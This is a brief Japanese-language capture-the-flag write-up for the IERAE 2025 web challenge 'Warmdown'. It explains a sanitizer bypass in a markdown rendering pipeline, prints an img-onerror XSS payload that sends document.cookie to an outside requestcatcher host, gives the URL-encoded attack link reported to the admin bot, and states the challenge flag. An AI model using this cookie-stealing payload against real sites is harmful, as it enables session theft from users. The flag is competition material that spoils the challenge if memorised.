web/Warmdown
🚩 #ierae2025 #web #2025 135 solves / 138 pts.
マークダウンをレンダリングできる。
sanitize -> marked -> escapeHtml -> unescapeHtml
markedでリンクがaタグに変換されてしまうので分割する
unescapeされるものをescapeしとくとbypassできXSS可能
code:txt
<img src=x onerror="location.href='htt'+'ps://dh.requestcatcher.com/e?'+document.cookie">
admin botに次のURLを通報する
code:url
http://web:3000/?markdown=%26lt%3Bimg+src%3Dx+onerror%3D%26quot%3Blocation.href%3D%26%23039%3Bhtt%26%23039%3B%2B%26%23039%3Bps%3A%2F%2Fdh.requestcatcher.com%2Fe%3F%26%23039%3B%2Bdocument.cookie%26quot%3B%26gt%3B
フラグ獲得
IERAE{I_know_XSS_is_the_m0st_popular_vu1nerabili7y}